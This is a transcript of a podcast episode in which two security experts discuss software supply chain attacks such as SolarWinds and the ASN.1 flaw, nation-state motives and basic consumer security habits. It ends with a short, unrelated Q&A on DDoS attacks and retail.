Gaus Rajnovic: Unfortunately, the answer is yes. Yes. There is also additional, how to say, complication to that, because usually the earlier in the chain you get, those really basic components they tend not to be so sexy so people don't really pay that much attention to them. And they'll just say, "Yeah, yeah, fine. I mean, that was working for the last 20, 30 years. Why should I look at it? Just take it and run." And I hear one great example for that. So there is something that is called Abstract Syntax Notation Number One, or in short ASN 1. It is something that is being used everywhere. Not many people heard about it, but it is a way how you would format data before you send it over the network to another peer, approximately 20 odd years ago, there was a vulnerability in ASN 1 library. So basically, the way how that data format was unpacked and processed, there was a vulnerability there. It was very bad vulnerability.
So you were able to do remote code execution on many, many devices by just sending a packet to a device and that packet and that vulnerability would be triggered the moment device start processing packet way, way, way before any other logic kicks in. So it was really basic stuff. If you go and look for those old advisories and you would still find them and just look number of the vendors which are affected, well, that used to be affected by that vulnerability, it is staggering. And also, if you look what protocols were implicated, meaning they were using and they still use ASN 1 notation. So it is absolutely unbelievable. But the worst thing is that we are now almost 20 years after that incident and I am not sure that all vendors still patched it because there are still plenty of old vulnerable libraries lying around and some small vendors, they would just take it and run it and nobody would look at it because, "Hey, it was working for the last 20, 30 years. Why bother? It works." So unfortunately, yes, the sooner you get into supply chain, the more damage you can make.
Ali Wyne: That's sobering and it's sobering to think that even 20 years on, 30 years on, that we still have some of these initial vulnerabilities that companies haven't adequately addressed. Charles, you talked about SolarWinds. It affected 18,000, right? I should say it targeted 18,000 organizations, but as you mentioned, the attacks themselves were only actually executed against a handful of government organizations. So let's say that I'm a business owner who didn't have my systems disrupted, can you help the listeners understand what might be going on? Why it might be the case that I, as a business owner, didn't have my systems disrupted by the SolarWinds attack?
Charles Carmakal: Yeah. And just to clarify, so the threat actor leveraged the SolarWinds backdoor to get access to both government and commercial entities.
Ali Wyne: Right.
Charles Carmakal: So there were a number of technology companies and a variety of other companies that weren't government entities that were targeted. Those companies, as you think about the victimology, I mean, a lot of those companies were pretty large organizations with very large customer bases that potentially could have been the next SolarWinds. And in fact, we may not be calling it the SolarWinds attack if it hadn't been detected when it was detected. What I mean by that is the threat actor, I believe, was surprised that they got caught when they did. I think they were surprised when we outed them. I think they probably thought that they had months or years to continue to do what they were doing. They were doing things in such a clandestine and quiet manner, and they were doing it relatively slowly because they didn't want to get caught. They wanted to keep stealing information, again, that was a strategic interest to the Russian government.
Ali Wyne: Sure.
Charles Carmakal: And I think that they were interested in continuing to create other supply chain attacks. When you look at some of the companies that they broke into, I mean, they broke into security companies, they broke into technology companies. I do think that in a way we're all lucky that it was detected when it was, because I think we very likely stopped what could have been the SolarWinds attack, plus the technology company X's attack, plus the technology company Y's attack that a lot of people would've probably talked about.
For companies outside of the big companies that were targeted, so you just think about just any other company out there, look, most organizations aren't of interest to the Russian government. When Russia conducts offensive operations, they do it for a reason. Sometimes they do it because there is political reason. Sometimes they do it for national defense purposes. Sometimes they do it because they're embarrassed by something. And so you think back to 2016, and no, I'm not going to give the example about the US presidential elections, because everybody talks about that, but I'm going to give a different example. I'm going to talk about the attacks against the Anti-Doping agencies. And there are a number of them that were hacked. And essentially what happened was there were Russian athletes that were accused of doping and it was made known that the Russian government was aware of the performance enhancement drugs that Russian athletes were using.
And so the Russian government wanted to prove that the rest of the world uses performance enhancement drugs and they dope and they hacked into a number of the anti-doping agencies and they ended up publishing a lot of information related to athletes that had failed tests before certain sporting events. And so that is an example of one of the reasons why the Russian government may conduct intrusion operations. There's usually a specific reason. Today as we think about the invasion of Ukraine, I think it's interesting that we haven't seen destructive attacks against the Western world yet. Now leading up to the Ukrainian invasion, we definitely saw a number of intrusions against ministries of foreign affairs and a variety of countries by Russian threat actors to steal information, again, of strategic interests to the government.
We definitely saw very destructive and disruptive attacks against organizations in Ukraine, leading up to the invasion and then coinciding with the invasion. But we haven't seen the attacks against other Western organizations. And I think the anticipation and the fear is that the Russian government tends to go tit for tat. They will very likely target the sectors that were most impacted in Russia, but in other parts of the world. So when you think about the sanctions against Russian entities, there's a very good chance or least the belief is that the Russian government will conduct some kind of cyber operation against the US financial services sector. There's fear and anticipation that the Russian government will target energy sector organizations. There's also fear that Russia will look at who are the companies that are publicly aligning with Ukraine and very vocally standing up against Russia and those are very likely going to be targets of Russian espionage and destructive operators.
Ali Wyne: This kind of actually goes to the name of this podcast series, patching the system. Gaus I want to come back to you so obviously, prevention is probably better than patching things up after an attack. Supply chains are getting more and more complex, more and more complicated. The vast majority of everything comes from somewhere else. I mean, what can companies realistically do to protect themselves?
Gaus Rajnovic: Well, trust, but verify. So I would like to split this answer into two. So one is from perspective of organization as a consumer of technology. So obviously you cannot go and, I don't know, disassemble and analyze each and every line of a patch that you receive and do that constantly for each and every device. It is just out of question, but what you can do is that you are monitoring what is going on in your environment. So that should be a part of your normal security operation center or CERT, or some other security function that you have, or should have internally. So you could trust that what you receive is legitimate and you trust that everything should be fine, but still you need to go and verify that things that you are seeing inside your system matches what you would expect to see inside the system.
And Charles said that at the beginning, how they discovered just because they spotted an anomaly. The other part of my answer is when I look this question through my vendor's eyes, what I can do as a vendor to make sure at least what I'm receiving is more or less legitimate or what I'm expecting, so that what I am giving further up supply chain is also do not contain any defects or vulnerabilities or anything else. And again, the same principle, trust, but verify, so all my suppliers. You can start with some really basic things. For example, I would like to know, contact in each of my suppliers who is handling product security vulnerability, meaning that if I find something in that component, I know who to call. Another, very basic thing, soft bill of material or bill of material in general. I would like to know what is inside component that I am receiving.
I would also like to know what tests my supplier have done on that component and what are results. And then I would repeat the testing myself just to make sure that everything matches. So those are some very basic things, but they help a lot. And I am sometimes ashamed to say that industry today, even with all this advancement, we are still having our vendors, and I'm not talking about really small vendors, I'm talking about midsize vendors, that we do not have anybody to call when we have a vulnerability in their product, and we need to fix that.
Ali Wyne: Charles, you heard what Gaus just said. I mean, what are some of the ways in which software and hardware manufacturers can come together to help build trust and to help verify? I mean, how should they coordinate their efforts, how should they keep their lines of communication open, especially because hardware increasingly needs constant updates to software?
Charles Carmakal: Yeah, absolutely. I mean, I definitely agree with Gaus on the trust but verify. And I think there's a certain amount of trust that organizations have to place in their vendors that they're doing the right things and I think most people want to do the right things. It sometimes becomes cost prohibitive to do so, so it doesn't always happen. I think having more transparency amongst security issues that exist that people identify in doing timely fixes is really important. And I'll tell you, it's definitely frustrating to security researchers that identify security vulnerabilities and in particular products, they notify the vendors and they never get an acknowledgement that the vendors heard that there's a vulnerability, or sometimes the vendor will say, "There isn't a vulnerability." Sometimes they'll say, "There is a vulnerability, but we'll get around to fixing it whenever we get around to fixing it."
And so responses like that can be really demoralizing for security researchers. Being as transparent as you can, trying to be timely with fixes, sharing information, and collaborating as a community are really important to addressing this problem.
Look, I'll tell you, things have dramatically changed for the better in terms of the collaboration of vendors and the security community. 20 years ago, we all used to laugh at Microsoft and say that they have arguably a terrible cybersecurity program. But when I look at probably one of the best case studies of an organization that's dramatically changed people's perceptions of them and just how much time and effort and care they put into security, I mean, Microsoft's one of the best examples.
Ali Wyne: So as both of you know, in an earlier podcast episode, I spoke to Annalaura Gallo. She's the head of the secretary of the Cybersecurity Tech Accord. Here's what she had to say about new approaches to combating ICT threats.
Annalaura Gallo: So we've been engaging with UN in the context of the dialogues on responsible state behavior in cyberspace, and we will continue to do so. And we have been encouraging state in particular to introduce a new norm that clearly declares this cyber attacks against the ICT supply chain out of bounds. But our signatories have also been calling for a shift in the way governments and businesses defend from this type of attacks, because taking a purely defensive approach is no longer enough. Organizations should start and think like the attackers.
Ali Wyne: So Gaus, why don't we start with you? What is your reaction to Annalaura's assessment?
Gaus Rajnovic: I agree with assessment. Yes, we need to change things because obviously the way they are at the moment, it is not ideal situation and we would like to improve it. Having said that, so there are multiple points and first point, for example, being somehow putting a supply chain out of bounds, so you should not attack supply chain. It is admirable goal. Personally, I am skeptical that it will be ever achieved just because supply chain is so big. I mean, when you look at single product, how many components are coming and from where, and to how many hands that product is passing, I mean, it is really hard to say, "Okay, so we will just limit everything that relates to supply chain. It is out of bound. We will not attack it. We will not mess with it, but we will go after everything else."
And please bear in mind that there are also initiatives, for example, some national infrastructure, which is necessary for a civilian to live, also to be put out on bounds and things like that. I'm afraid in flux of wars, it doesn't work that way. So admirable, but skeptical towards it. If I may just quickly?
Ali Wyne: Sure.
Gaus Rajnovic: There is another point of not being only defensive. So yes, I heard those ideas multiple times, which is suggesting that we should also go into offensive in a sense, at least to have an active defense. Again, personally, I'm not in favor of active defense because in my mind, imagine two gun slingers in old Wild West. They would just come to the streets. Everybody would move aside. Then they would have a shootout and then pack their things and go away to continue this duel at some other times.
But what will happen is that after that duel, there will be lots of bullets in the walls, broken windows, and somebody will have to go and fix that. So just apply this metaphor into a cyberspace. And yes, you will have bad guys and good guys, and they will having go at each other but in the meantime and then throughout that battle, there will be lots of broken stuff, which somebody will have to fix later. And unfortunately, some of that stuff that has been broken during the conflict, there are people whose life depends on it. And that is the reason why I'm not overly fond of active defense.
Charles Carmakal: Look, I think there are general rules of engagement that certain countries operate by. So for example, when you look at the Chinese government, they typically conduct operations for political or military purposes. They used to also conduct offensive operations for economic purposes, but there was an agreement with president Obama and president Xi where nobody acknowledged hacking into companies in each other's countries, but they said in the future, they wouldn't do it for economic espionage. So I think rules of our engagement are really important. That helps figure out what is the line, when does it get crossed, or what events would be considered crossing the line and a potential escalation. And that's something that we're all thinking about right now. If what happened in Ukraine a few years ago with NotPetya happened in the United States, I'd be afraid to figure out and to see what the United States might do in retaliation.
And so we're all trying to figure out and I think Russia and many governments are very mindful of at what point in time does a cyber operation cross the line and force the victim, or maybe a collection of countries to retaliate in a very escalatory way. And then at what point in time does the retaliation include kinetic consequences? So for example, when we look at the Colonial Pipeline incident from last year, from my perspective, our assessment is that the Colonial Pipeline intrusion was done for financially motivated purposes by organized criminals. We don't believe that Putin had directed that, or at least we have no evidence that Putin had knowledge or directed that. But it'd be a very different thing if there was evidence of Putin directly asking for the intrusion of Colonial Pipeline that would have an impact on the supply chain of gas getting to airplanes and vehicles.
And so, again, I think we're all thinking about the escalation. So it is good to have rules of engagement, but the downside of having rules of engagement is basically everything that you are not expressly saying is prohibited. Is everything else okay to do? So if you say-
Ali Wyne: Right.
Charles Carmakal: "Protect the supply chain," or, "You can't attack healthcare," is it then fair game to hack into financial services companies, into manufacturing companies, and schools, right? So that's the counterpoint. So it's hard to tell, but I think the rules of engagement, generally speaking, are good.
Ali Wyne: I would guess that most of the folks who are tuning in to today's podcast, don't have your expertise either on the hardware side or on the software side. Most of the listeners, I would guess, are just lay consumers. And so for us lay consumers, what can we do? What can we do to enhance the security of our devices, to mitigate some of the issues that we've talked about today?
Charles Carmakal: Yep. There's three things and these are three very important things that are, unfortunately, somewhat hard to do. The first thing is we strongly encourage everybody to use a password manager and have a unique and different password for every single website that you use. And the reason for that is because when a threat actor hacks into a particular website or a company, one thing that they do is they download all the usernames and the passwords for all the users that use that resource. And they attempt to use those usernames and passwords for other websites. It could be email accounts or bank accounts or social media accounts, but that is a very prominent way for how threat actors break into organizations and break into accounts and steal data from people. Number two, use multifactor authentication. So that's basically where you provide an username, a password, and then some secondary form of authentication.
Sometimes it's a code that gets texted to you over your phone, sometimes it's an email that gets sent to you with a code, or maybe there's an app on your phone that gives you a randomly generated number. That helps mitigate the risk of somebody getting access to your account. And the third thing is apply software patches when your device tells you to apply software patches, but try to be cautious and careful. You don't want to get tricked into clicking a link on a website that's telling you to apply a patch, but that's actually malicious. You want to get comfortable and familiar with where would a computer or a device tell you to apply an update and just get comfortable with that and do it when they're asked and try to be mindful and try to be aware that there are trickers or scammers and threat actors that will attempt to trick people into applying patches that aren't real that are actually malicious.
Gaus Rajnovic: I totally agree with Charles, what he said, and those are the things that the consumer can do. I mean, looking from perspective of somebody who is making those products, they need to be as easy to use as possible. And unfortunately, that also limits what other actions users can do. At the other end, also, if I have a product that everybody needs to tweak, I don't know, two hours before they use it, I will not sell that product at all because people want functionality and people want stuff to work as is. So password management, absolutely must, do it. There is one thing that, at least on producing side, we see that it is coming, something that is called security labels. So there are several governments around the world who are toying with that idea. So basically that you have a label on a product that we tell you how secure the product is more or less. It is not finalized yet.
There are some pilot schemes going in Finland and Singapore. Most likely it is something that will come to the market in the next, I don't know, three to five years or thereabouts. So that will be also something that later on consumers could look for and try to find if this product is more secure than alternative and then obviously try to base their purchasing decision on that label. But we are not there yet at the moment.
Ali Wyne: Charles Carmakal, senior vice president and chief technology officer at Mandiant, Gaus Rajnovic, cybersecurity manager at Panasonic Europe, thank you both so much for being here.
Charles Carmakal: Absolutely.
Gaus Rajnovic: Pleasure was mine.
Ali Wyne: Well, that's it for this episode of Patching the System. You can tune in next time for more on the future of cyber threats and also what we can do about them. You can catch this particular podcast as a special drop Ian Bremmer's GZERO World Feed anywhere you get your podcast. I'm Ali Wyne. Thanks very much for listening.
Preventing a DDoS attack; brick and mortars no more
Nicholas Thompson, editor-in-chief of WIRED, discusses technology industry news today:
What is a DDoS attack and how can they be prevented?
That's a digital denial of service attack. Somebody uses malware to infect a bunch of computers or Internet of Things devices and sends lots of traffic at a server trying to knock the server offline. What can you do if you own the server? Buy more space, become part of a large operation like AWS that can offer you expanded space during the time of an attack, and build good filtering and blocking software.
Because of COVID-19 and the continued expansion of e-commerce, what brick and mortar will go away?
A lot, unfortunately. We're all learning how to buy things online. Companies are learning how to ship things online. And we're not going to want to be in contact with people even when the world starts to reopen. So, any business that was in trouble before this will be in even more trouble after this.
Which next gen console are you more excited for, the Microsoft mini fridge or the Sony Wi-Fi router?
I'm just excited to argue with my kids about whether they get a PlayStation or an X box.